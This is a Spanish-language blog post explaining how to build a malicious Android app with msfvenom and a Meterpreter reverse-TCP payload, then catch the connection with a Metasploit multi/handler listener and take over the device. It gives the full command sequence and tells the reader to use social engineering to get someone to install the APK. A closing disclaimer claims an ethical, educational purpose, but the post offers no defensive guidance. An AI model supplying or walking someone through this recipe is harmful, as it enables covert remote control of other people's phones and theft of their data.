Como crear un payload para Android con Metasploit

 


Hola a todos, como habréis podido comprobar, hemos hecho unos cambios en las funcionalidades extra del blog. Ya que la aplicación de mensajería automática que teníamos terminó su servicio el 1 de enero, os recuerdo que os podéis suscribir al boletín de la web. Tenéis disponibles varios métodos, aunque el que recomendamos es el de e-mail. Os prometemos, que no vamos a ser "pesados" enviando e-mails todos los días. Tan solo recibireis las entradas que publiquemos para estar siempre al día.

Hoy, os voy a hablar sobre como podemos crear una aplicación maliciosa (payload) para tener un control casi total de un dispositivo Android.

¡Hagamos una aplicación!

Primero, debemos crear el archivo con una herramienta llamada msfvenom. Para crearlo, escribimos

msfvenom -p android/meterpreter/reverse_tcp LHOST=[TU IP] LPORT=[TU PUERTO] R> ~/Desktop/instalar.apk

En este comando, el argumento "-p" indica el payload, "LHOST" nuestra dirección IP, "LPORT" el puerto por el que nos vamos a comunicar y "R>" el directorio en el que se va a crear el archivo. 
Para redes internas (cuando el ataque no sale de una red) usaremos el puerto 8080 y la ip local, que suele ser 192.168.1.X, pero si es externa, usaremos el puerto que queramos y nuestra ip pública. Si es externa, seguramente haya que configurar la redirección de puertos en nuestro router. (Ya os explicaré algún momento como se hace eso)

Ahora es tu turno, te toca hacer ingeniería social para que alguien se descargue la aplicación y la instale en su Android (siempre con su autorización)


Configura Metasploit

Metasploit, como ya muchos sabréis es una aplicación de tipo cli que nos permite acceder a una gran cantidad de payloads y exploits. Su mayor funcionalidad, es la de crear payloads que nos permiten tener un control completo o casi completo sobre un dispositivo.

Para ejecutarle, hay que escribir

msfconsole

Puede que tarde un rato, ya que tiene que cargar todos los módulos que nos van a permitir hackear, así que no te desesperes.

Cuando se haya cargado, tenemos que decirle que payload tiene la aplicación. Se lo podemos indicar escribiendo los siguientes comandos:

use multi/handler
y
set PAYLOAD android/meterpreter/reverse_tcp

Ahora, para que pueda recibir y enviar los datos, tenemos que indicar nuestra dirección ip y el puerto que pusimos a la hora de crear la app.

set LHOST=[TU IP]
set LPORT=[TU PUERTO]

Comencemos a escuchar

Para empezar el hackeo, en teoría tan solo hay que ejecutar el comando

exploit

Prueba a ejecutarlo, pero si te da error continua con los siguientes pasos, sino vete al final del post.

exit
sessions

Este último comando, te hará un listado de las sesiones activas en el exploit. Para meternos en una, volvemos a ejecutar el comando "sessions" seguido del número de sesión en la que nos queramos meter.

sessions [nº de sesión ej: 13]

Ya estamos dentro y nos permite ejecutar un montón de opciones, pero como siempre digo yo:
Un hacker, no tiene que saberse todos los comandos de memoria, pero sí como usarlos
Así que para poder ver los comando disponibles, ejecutamos

show options

Sí, así de facil es hacerse con el control de un android con ayuda de Metasploit.

Espero que os haya gustado, y recuerda que abajo puedes poner comentarios y nosotros, intentaremos ayudarte en caso de que tengas algún problema. Y si es tu opinión, te estaremos muy agradecidos.


RECUERDA que este contenido se ha creado con fines éticos y educativos para enseñar al lector como se realizan este tipo de ataques y pueda tener una mejor protección. El autor y el administrador del blog, no se hacen responsables de posibles actos ilícitos o poco éticos que se realice con información obtenida de esta fuente.

Hasta la próxima!!!


Comentarios